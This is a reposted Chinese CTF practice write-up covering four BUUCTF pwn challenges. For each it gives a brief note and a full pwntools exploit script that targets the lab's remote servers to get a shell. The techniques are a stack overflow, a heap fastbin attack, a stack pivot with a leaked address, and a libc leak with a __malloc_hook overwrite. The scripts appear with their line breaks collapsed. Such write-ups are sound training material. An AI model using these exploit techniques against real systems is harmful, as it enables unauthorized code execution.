當(dāng)前位置：首頁(yè) >

PWN-PRACTICE-BUUCTF-16

發(fā)布時(shí)間：2023/12/10 35 豆豆

生活随笔收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-16 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

PWN-PRACTICE-BUUCTF-16

- mrctf2020_easyoverflow
- hitcontraining_magicheap
- ciscn_2019_s_4
- 0ctf_2017_babyheap

mrctf2020_easyoverflow

覆蓋main函數(shù)中的v5，使之為"n0t_r3@11y_f1@g"

from pwn import * r=remote("node4.buuoj.cn",29521) payload='a'*0x30+"n0t_r3@11y_f1@g" r.sendline(payload) r.interactive()

hitcontraining_magicheap

參考：picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap

from pwn import * io=remote("node4.buuoj.cn",27011) #io=process("./magicheap") elf=ELF("./magicheap")def create(size,content):io.sendlineafter("choice :","1")io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap:",content) def edit(index,size,content):io.sendlineafter("choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap : ",content) def delete(index):io.sendlineafter("choice :","3")io.sendlineafter("Index :",str(index)) def getshell():io.sendlineafter("choice :","4869")heaparray=0x00000000006020C0 fake_chunk_prev_size=heaparray-0x38+5#gdb.attach(io) #pause()create(0x10,"a"*8)#chunk0 create(0x10,"b"*8)#chunk1 create(0x60,"c"*8)#chunk2#pause()delete(2)#pause()payload="b"*0x10+p64(0)+p64(0x71)+p64(fake_chunk_prev_size) edit(1,len(payload),payload)#pause()create(0x60,"c"*8)#chunk2 create(0x60,"d"*8)#fake_chunk#pause()payload="d"*3+p64(0x1305+1) edit(2,len(payload),payload)getshell()io.interactive()

ciscn_2019_s_4

泄露棧地址，然后棧遷移

from pwn import * context.log_level="debug" #io=process('./ciscn_s_4') io=remote('node4.buuoj.cn',28112) elf=ELF('./ciscn_s_4')input_stk_offset=0x50 leave_ret=0x080484b8 system=0x08048559#gdb.attach(io,"break * 0x080485CD")io.recvuntil('your name?\n') payload='a'*(40-4)+'b'*4 io.send(payload) io.recvuntil('bbbb') io.recv(12) stk=u32(io.recv(4)) input_stk=stk-input_stk_offset io.recvuntil('\n') payload='a'*4+p32(system)+p32(input_stk+12)+'/bin/sh\x00' payload=payload.ljust(0x28,'\x00') payload+=p32(input_stk) payload+=p32(leave_ret) io.send(payload) io.interactive()

0ctf_2017_babyheap

參考：0ctf_2017_babyheap

from pwn import * context.log_level="debug" io=remote("node4.buuoj.cn",28235) #io=process("./0ctf_2017_babyheap") elf=ELF("./0ctf_2017_babyheap") libc=ELF("./libc-2.23-16-x64.so") def alloc(size):io.sendlineafter("Command: ","1")io.sendlineafter("Size: ",str(size)) def fill(index,size,content):io.sendlineafter("Command: ","2")io.sendlineafter("Index: ",str(index))io.sendlineafter("Size: ",str(size))io.sendlineafter("Content: ",content) def free(index):io.sendlineafter("Command: ","3")io.sendlineafter("Index: ",str(index)) def dump(index):io.sendlineafter("Command: ","4")io.sendlineafter("Index: ",str(index))#gdb.attach(io) #pause()alloc(0x10)#0 alloc(0x10)#1 alloc(0x80)#2 alloc(0x20)#3 alloc(0x60)#4 alloc(0x10)#5#pause()payload="a"*0x18+p64(0xb1) fill(0,len(payload),payload) free(1) alloc(0xa0)#1 calloc payload="b"*0x10+p64(0)+p64(0x91) fill(1,len(payload),payload) free(2) dump(1) libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78 print(hex(libc_base)) malloc_hook=libc_base+libc.sym["__malloc_hook"] print(hex(malloc_hook))#pause()free(4) payload="c"*0x20+p64(0)+p64(0x71)+p64(malloc_hook-0x23) fill(3,len(payload),payload) alloc(0x60)#2 alloc(0x60)#4 fake chunk one_gadget=libc_base+0x4526a payload="\x00"*0x13+p64(one_gadget) fill(4,len(payload),payload)#pause()alloc(1)io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-16的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： 2017年招商银行微信申请信用卡秒批方法
下一篇：招行现金分期还款日是哪一天招行现金分期